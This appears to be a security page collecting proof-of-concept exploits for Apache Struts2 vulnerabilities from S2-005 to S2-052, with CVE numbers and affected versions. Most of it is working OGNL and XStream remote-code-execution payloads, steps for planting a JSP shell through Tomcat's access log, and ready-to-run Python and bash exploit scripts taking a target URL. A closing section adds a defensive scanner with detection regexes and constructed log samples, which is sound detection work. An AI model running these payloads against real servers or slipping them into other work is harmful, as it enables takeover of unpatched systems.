Struts2 Vulnerability Collection: PoC/EXP

Category: javasec_cn

In every payload below, aaaaaaaaaaaaaaaaaaa is the placeholder sitting in the command position (the argument to exec/ProcessBuilder); replace it with the command to run.

[+]1 S2-005 CVE-2010-1870
CVE-2010-1870 Affected versions: Struts 2.0.0 – Struts 2.1.8.1 Advisory: http://struts.apache.org/release/2.2.x/docs/s2-005.html

OGNL injection through parameter names. The octal escapes \43, \75 and \40 are OGNL string escapes for #, = and space, which gets the expression past the character whitelist added for S2-003; the expression then re-enables static method access and clears the excludeProperties set before calling Runtime.exec.

('\43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('\43context[\'xwork.MethodAccessor.denyMethodExecution\']\75false')(b))&('\43c')(('\43_memberAccess.excludeProperties\75@java.util.Collections@EMPTY_SET')(c))&(g)(('\43mycmd\75\'aaaaaaaaaaaaaaaaaaa\'')(d))&(h)(('\43myret\75@java.lang.Runtime@getRuntime().exec(\43mycmd)')(d))&(i)(('\43mydat\75new\40java.io.DataInputStream(\43myret.getInputStream())')(d))&(j)(('\43myres\75new\40byte[51020]')(d))&(k)(('\43mydat.readFully(\43myres)')(d))&(l)(('\43mystr\75new\40java.lang.String(\43myres)')(d))&(m)(('\43myout\75@org.apache.struts2.ServletActionContext@getResponse()')(d))&(n)(('\43myout.getWriter().println(\43mystr)')(d))

[+]2 S2-009 CVE-2011-3923
CVE-2011-3923 Affected versions: Struts 2.0.0 – Struts 2.3.1.1 Advisory: http://struts.apache.org/release/2.3.x/docs/s2-009.html

The OGNL expression is placed in a parameter value and then referenced by name from a second parameter (z[(class.classLoader.jarPath)('meh')]), so the parameter-name whitelist does not see it. The + characters are URL-encoded spaces.

class.classLoader.jarPath=(#context["xwork.MethodAccessor.denyMethodExecution"]=+new+java.lang.Boolean(false),+#_memberAccess["allowStaticMethodAccess"]=true,+#a=@java.lang.Runtime@getRuntime().exec('aaaaaaaaaaaaaaaaaaa').getInputStream(),#b=new+java.io.InputStreamReader(#a),#c=new+java.io.BufferedReader(#b),#d=new+char[50000],#c.read(#d),#sbtest=@org.apache.struts2.ServletActionContext@getResponse().getWriter(),#sbtest.println(#d),#sbtest.close())(meh)&z[(class.classLoader.jarPath)('meh')]

[+]3 S2-013 CVE-2013-1966
CVE-2013-1966 Affected versions: Struts 2.0.0 – Struts 2.3.14.1 Advisory: http://struts.apache.org/release/2.3.x/docs/s2-013.html

Triggered through the s:a / s:url tags with includeParams set to all; the ${...} in the parameter value is evaluated as OGNL when the tag rebuilds the URL.

a=1${(#_memberAccess["allowStaticMethodAccess"]=true,#a=@java.lang.Runtime@getRuntime().exec('aaaaaaaaaaaaaaaaaaa').getInputStream(),#b=new+java.io.InputStreamReader(#a),#c=new+java.io.BufferedReader(#b),#d=new+char[50000],#c.read(#d),#sbtest=@org.apache.struts2.ServletActionContext@getResponse().getWriter(),#sbtest.println(#d),#sbtest.close())}

[+]4 S2-016 CVE-2013-2251
CVE-2013-2251 Affected versions: Struts 2.0.0 – Struts 2.3.15 Advisory: http://struts.apache.org/release/2.3.x/docs/s2-016.html

DefaultActionMapper evaluates the value after the redirect: / redirectAction: / action: prefixes as OGNL. The string concatenation ('co'+'m.open'+...) only serves to break up the class name for filters; \\s is the regex passed to split().

redirect:${#req=#context.get('co'+'m.open'+'symphony.xwo'+'rk2.disp'+'atcher.HttpSer'+'vletReq'+'uest'),#s=new java.util.Scanner((new java.lang.ProcessBuilder('aaaaaaaaaaaaaaaaaaa'.toString().split('\\s'))).start().getInputStream()).useDelimiter('\\AAAA'),#str=#s.hasNext()?#s.next():'',#resp=#context.get('co'+'m.open'+'symphony.xwo'+'rk2.disp'+'atcher.HttpSer'+'vletRes'+'ponse'),#resp.setCharacterEncoding('UTF-8'),#resp.getWriter().println(#str),#resp.getWriter().flush(),#resp.getWriter().close()}

[+]5 S2-019 CVE-2013-4316
CVE-2013-4316 Affected versions: Struts 2.0.0 – Struts 2.3.15.1
Advisory: http://struts.apache.org/release/2.3.x/docs/s2-019.html

Only reachable when struts.devMode is true: the DebuggingInterceptor evaluates the expression parameter when debug=command is set. Because allowStaticMethodAccess cannot be assigned directly here, the payload flips it through reflection (getDeclaredField / setAccessible).

debug=command&expression=#f=#_memberAccess.getClass().getDeclaredField('allowStaticMethodAccess'),#f.setAccessible(true),#f.set(#_memberAccess,true),#req=@org.apache.struts2.ServletActionContext@getRequest(),#resp=@org.apache.struts2.ServletActionContext@getResponse().getWriter(),#a=(new java.lang.ProcessBuilder(new java.lang.String[]{'aaaaaaaaaaaaaaaaaaa'})).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[10000],#d.read(#e),#resp.println(#e),#resp.close()

[+]6 S2-020 CVE-2014-0094
CVE-2014-0094 Affected versions: Struts 2.0.0 – Struts 2.3.16 Advisory: http://struts.apache.org/release/2.3.x/docs/s2-020.html

ParametersInterceptor lets a request walk class.classLoader.*; on Tomcat 8 the path below reaches the AccessLogValve (pipeline.first) and turns the access log into a JSP. Note that the fix in 2.3.16.1 was incomplete and was bypassed by S2-021 (CVE-2014-0112/0113), so 2.3.16.2 is the earliest safe release.

1. Set the properties:

?class.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT
?class.classLoader.resources.context.parent.pipeline.first.prefix=shell
?class.classLoader.resources.context.parent.pipeline.first.suffix=.jsp

2. Request the URL below to make Tomcat rotate its access log (one pitfall: this property must be numeric, so it is set to 1). From this point on the access log is written to webapps/ROOT/shell1.jsp (prefix + date format + suffix).

?class.classLoader.resources.context.parent.pipeline.first.fileDateFormat=1 

3. Send the request below so that the JSP code is written into the access log as part of the logged request line:

/aaaa.jsp?a=<%Runtime.getRuntime().exec("calc");%> 

4. With the parameters set above, request the URL below and watch the planted code execute:

http://127.0.0.1/shell1.jsp 

[+]7 S2-032 CVE-2016-3081

CVE-2016-3081 Affected versions: Struts 2.3.20 – Struts 2.3.28 (except 2.3.20.3 and 2.3.24.3) Advisory: http://struts.apache.org/release/2.3.x/docs/s2-032.html

Requires Dynamic Method Invocation (struts.enable.DynamicMethodInvocation = true); the method: prefix is then evaluated as OGNL. The encoding/pp/ppp parameters are read back from #parameters so no quotes are needed in the expression.

?method:%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23res%3d%40org.apache.struts2.ServletActionContext%40getResponse(),%23res.setCharacterEncoding(%23parameters.encoding%5B0%5D),%23w%3d%23res.getWriter(),%23s%3dnew+java.util.Scanner(@java.lang.Runtime@getRuntime().exec(%23parameters.cmd%5B0%5D).getInputStream()).useDelimiter(%23parameters.pp%5B0%5D),%23str%3d%23s.hasNext()%3f%23s.next()%3a%23parameters.ppp%5B0%5D,%23w.print(%23str),%23w.close(),1?%23xx:%23request.toString&cmd=aaaaaaaaaaaaaaaaaaa&pp=%5C%5CA&ppp=%20&encoding=UTF-8

[+]8 S2-037 CVE-2016-4438
Affected versions: Struts 2.3.20 – Struts 2.3.28.1 Advisory: http://struts.apache.org/docs/s2-037.html

REST plugin: the method name taken from the URL path is evaluated as OGNL, so the expression goes in the path segment before .json.

/(%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)%3f(%23wr%3d%23context%5b%23parameters.obj%5b0%5d%5d.getWriter(),%23rs%3d@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec(%23parameters.command%5B0%5D).getInputStream()),%23wr.println(%23rs),%23wr.flush(),%23wr.close()):xx.toString.json?&obj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&content=7556&command=aaaaaaaaaaaaaaaaaaa

[+]9 devMode CVE-xxxx-xxxx

Not a code defect but a configuration one: with struts.devMode = true, debug=browser evaluates the object parameter as OGNL.

?debug=browser&object=(#_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)?(#context[#parameters.rpsobj[0]].getWriter().println(@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec(#parameters.command[0]).getInputStream()))):sb.toString.json&rpsobj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&command=aaaaaaaaaaaaaaaaaaa

[+] S2-045 CVE-2017-5638

Affected versions: Struts 2.3.5 – Struts 2.3.31, Struts 2.5 – Struts 2.5.10

The Jakarta multipart parser puts the offending Content-Type value into its error message, and that message is evaluated as OGNL. Any URL is enough; only the header matters.

import requests
import sys

header = dict()
header['Content-Type'] = "%{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='whoami').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}"

# usage: python3 s2-045.py http://target/index.action
result = requests.get(sys.argv[1], headers=header)
print(result.content)

[+] S2-046 CVE-2017-5638

Affected versions: Struts 2.3.x before 2.3.32 and 2.5.x before 2.5.10.1

Same bug as S2-045, reached through the multipart body instead of the header: the filename in Content-Disposition carries the expression and the \0 after it makes the parser raise the error whose message is evaluated. Extra curl arguments after the command are passed through ($@).

#!/bin/bash

url=$1
cmd=$2
shift
shift

boundary="---------------------------735323031399963166993862150"
content_type="multipart/form-data; boundary=$boundary"
payload=$(echo "%{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='"$cmd"').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}")

# usage: ./s2-046.sh http://target/index.action "id" [extra curl options]
printf -- "--$boundary\r\nContent-Disposition: form-data; name=\"foo\"; filename=\"%s\0b\"\r\nContent-Type: text/plain\r\n\r\nx\r\n--$boundary--\r\n\r\n" "$payload" | curl "$url" -H "Content-Type: $content_type" -H "Expect: " -H "Connection: close" --data-binary @- "$@"

[+] S2-048 CVE-2017-9791
Affected versions: the showcase application in the Struts 2.3.x series (Struts 1 plugin: untrusted input is passed to an action message and evaluated as OGNL)

The checker below runs a benign echo and looks for its marker in the response; it is the page's Python 2 script ported to Python 3. \u006A is the unicode escape for j, kept as an evasion in the class name.

#!/usr/bin/env python3
# coding=utf-8
''' s2-048 poc '''
import urllib.parse
import urllib.request
from http.cookiejar import CookieJar


def post(url, data):
    # enable cookies so the showcase session survives the redirect
    opener = urllib.request.build_opener(urllib.request.HTTPCookieProcessor(CookieJar()))
    body = urllib.parse.urlencode(data).encode()
    response = opener.open(url, body)
    return response.read().decode(errors='replace')


def main():
    posturl = "http://www.test.com/struts2-showcase/integration/saveGangster.action"
    data = {
        'name': "${(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess=#dm).(#ef='echo s2-048-EXISTS').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#efe=(#iswin?{'cmd.exe','/c',#ef}:{'/bin/bash','-c',#ef})).(#p=new \\u006Aava.lang.ProcessBuilder(#efe)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}",
        'age': 'bbb',
        '__checkbox_bustedBefore': 'true',
        'description': 'ccc',
    }
    res = post(posturl, data)[:100]
    if 's2-048-EXISTS' in res:
        print(posturl, 's2-048 EXISTS')
    else:
        print(posturl, 's2-048 does not EXIST')


if __name__ == '__main__':
    main()

[+] S2-052 CVE-2017-9805
Affected versions: Struts 2.1.2 – Struts 2.3.33, Struts 2.5 – Struts 2.5.12

REST plugin: the XStreamHandler deserializes an application/xml body without any type restriction. The body below is the public gadget chain (NativeString -> Base64Data -> CipherInputStream -> FilterIterator -> ProcessBuilder.start); the command in <string> is a macOS example and the body's Content-Length must be recomputed after changing it.

POST /struts2-rest-showcase/orders/3;jsessionid=A82EAA2857A1FFAF61FF24A1FBB4A3C7 HTTP/1.1
Host: 127.0.0.1:8080
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:54.0) Gecko/20100101 Firefox/54.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Content-Type: application/xml
Content-Length: 1663
Referer: http://127.0.0.1:8080/struts2-rest-showcase/orders/3/edit
Cookie: JSESSIONID=A82EAA2857A1FFAF61FF24A1FBB4A3C7
Connection: close
Upgrade-Insecure-Requests: 1

<map>
<entry>
<jdk.nashorn.internal.objects.NativeString>
<flags>0</flags>
<value class="com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data">
<dataHandler>
<dataSource class="com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource">
<is class="javax.crypto.CipherInputStream">
<cipher class="javax.crypto.NullCipher">
<initialized>false</initialized>
<opmode>0</opmode>
<serviceIterator class="javax.imageio.spi.FilterIterator">
<iter class="javax.imageio.spi.FilterIterator">
<iter class="java.util.Collections$EmptyIterator"/>
<next class="java.lang.ProcessBuilder">
<command>
<string>/Applications/Calculator.app/Contents/MacOS/Calculator</string>
</command>
<redirectErrorStream>false</redirectErrorStream>
</next>
</iter>
<filter class="javax.imageio.ImageIO$ContainsFilter">
<method>
<class>java.lang.ProcessBuilder</class>
<name>start</name>
<parameter-types/>
</method>
<name>foo</name>
</filter>
<next class="string">foo</next>
</serviceIterator>
<lock/>
</cipher>
<input class="java.lang.ProcessBuilder$NullInputStream"/>
<ibuffer></ibuffer>
<done>false</done>
<ostart>0</ostart>
<ofinish>0</ofinish>
<closed>false</closed>
</is>
<consumed>false</consumed>
</dataSource>
<transferFlavors/>
</dataHandler>
<dataLen>0</dataLen>
</value>
</jdk.nashorn.internal.objects.NativeString>
<jdk.nashorn.internal.objects.NativeString reference="../jdk.nashorn.internal.objects.NativeString"/>
</entry>
<entry>
<jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/>
<jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/>
</entry>
</map>
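The payloads above share a small set of telltales (the #_memberAccess / DEFAULT_MEMBER_ACCESS tampering, the redirect: and method: prefixes, debug=command, class.classLoader, the Runtime/ProcessBuilder calls and the NativeString XStream gadget), but each PoC hides them differently: %-encoding, double encoding, OGNL octal escapes (\43 for #), and \uXXXX escapes. The scanner below is an added example written for this page, not code from the original collection: it normalizes those evasions first and then matches the signatures, so the same rule catches S2-005's \43_memberAccess and S2-032's %23_memberAccess. The log lines and request fragments in SAMPLES are constructed for the demo and modelled on the PoCs above (they are not captured traffic), and the rule names are this script's own labels, not vendor signature IDs.

```python
#!/usr/bin/env python3
"""Signature scan for the Struts 2 OGNL / XStream injection patterns collected above.

Added example for this page; SAMPLES are constructed, not real traffic.
"""
import re
from urllib.parse import unquote


def normalize(text: str) -> str:
    """Undo the encodings the PoCs use so one rule set matches all variants."""
    text = unquote(unquote(text))  # decode twice: payloads are often double-encoded
    # \uXXXX escapes, e.g. \u006Aava.lang.ProcessBuilder -> java.lang.ProcessBuilder
    text = re.sub(r'\\u([0-9a-fA-F]{4})', lambda m: chr(int(m.group(1), 16)), text)
    # OGNL octal escapes used by S2-005: \43 -> '#', \75 -> '=', \40 -> ' '
    text = re.sub(r'\\([0-7]{2,3})', lambda m: chr(int(m.group(1), 8)), text)
    return text


# Rule labels are this script's own; the advisories in parentheses are where the
# pattern appears on this page.
RULES = {
    "memberAccess tamper (S2-005/009/013/019)":
        re.compile(r'#_memberAccess|allowStaticMethodAccess|denyMethodExecution'),
    "redirect: prefix (S2-016)":
        re.compile(r'\bredirect(Action)?:\$\{'),
    "debug parameter (S2-019/devMode)":
        re.compile(r'(^|[?&])debug=(command|browser)\b'),
    "class.classLoader (S2-020)":
        re.compile(r'class\.classLoader\.'),
    "method: prefix (S2-032)":
        re.compile(r'(^|[?&/])method:'),
    "DEFAULT_MEMBER_ACCESS (S2-032/037/045/046/048)":
        re.compile(r'@ognl\.OgnlContext@DEFAULT_MEMBER_ACCESS|getExcludedClasses\(\)\.clear'),
    "OGNL process spawn":
        re.compile(r'@java\.lang\.Runtime@getRuntime\(\)\.exec|java\.lang\.ProcessBuilder'),
    "XStream gadget (S2-052)":
        re.compile(r'jdk\.nashorn\.internal\.objects\.NativeString|javax\.imageio\.spi\.FilterIterator'),
}


def scan(text: str) -> list:
    """Return the labels of all rules that fire on one log line, header or body fragment."""
    norm = normalize(text)
    return [name for name, rx in RULES.items() if rx.search(norm)]


# Constructed samples (Apache-style access log lines plus two raw request fragments).
SAMPLES = {
    # benign: devMode debug=true is not one of the injection entry points
    "benign": '10.0.0.5 - - [10/Mar/2017:10:01:02 +0000] "GET /index.action?debug=true HTTP/1.1" 200 512',
    # S2-005 style: '#' hidden as OGNL octal \43, then %-encoded by the client
    "s2_005": '10.0.0.9 - - [10/Mar/2017:10:02:00 +0000] "GET /login.action?(%27%5C43_memberAccess.allowStaticMethodAccess%27)(a)=true HTTP/1.1" 200 512',
    # S2-016 redirect: prefix, double URL-encoded
    "s2_016": '10.0.0.7 - - [10/Mar/2017:10:01:09 +0000] "GET /index.action?redirect:$%257B%2523req%253D%2523context.get(%2527com.opensymphony.xwork2.dispatcher.HttpServletRequest%2527)%257D HTTP/1.1" 302 0',
    # S2-019 debug=command with the reflection trick
    "s2_019": '10.0.0.7 - - [10/Mar/2017:10:01:12 +0000] "GET /index.action?debug=command&expression=%23f%3D%23_memberAccess.getClass() HTTP/1.1" 200 77',
    # S2-020 class.classLoader property walk
    "s2_020": '10.0.0.7 - - [10/Mar/2017:10:01:15 +0000] "GET /index.action?class.classLoader.resources.context.parent.pipeline.first.suffix=.jsp HTTP/1.1" 200 512',
    # S2-032 method: prefix (needs DMI)
    "s2_032": '10.0.0.9 - - [10/Mar/2017:10:02:03 +0000] "GET /index.action?method:%23_memberAccess%3D@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS HTTP/1.1" 200 9',
    # S2-045: expression in the Content-Type header, class name split with a \u escape
    "s2_045_header": "Content-Type: %{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#p=new \\u006Aava.lang.ProcessBuilder(#cmds))}",
    # S2-052: start of the XStream gadget chain in an application/xml body
    "s2_052_body": '<map><entry><jdk.nashorn.internal.objects.NativeString><value class="com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data">',
}


def scan_all(samples=SAMPLES) -> dict:
    """Scan every sample; returns {sample name: [rule labels that fired]}."""
    return {key: scan(text) for key, text in samples.items()}


if __name__ == '__main__':
    for key, hits in scan_all().items():
        print(f"{key:14s} -> {hits or 'clean'}")
```

Feed real access logs one line at a time through scan(); because normalization runs before matching, a WAF-style signature written against the decoded form is enough, and a line that fires "OGNL process spawn" together with any of the entry-point rules is a strong exploitation indicator rather than a scanner probe.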
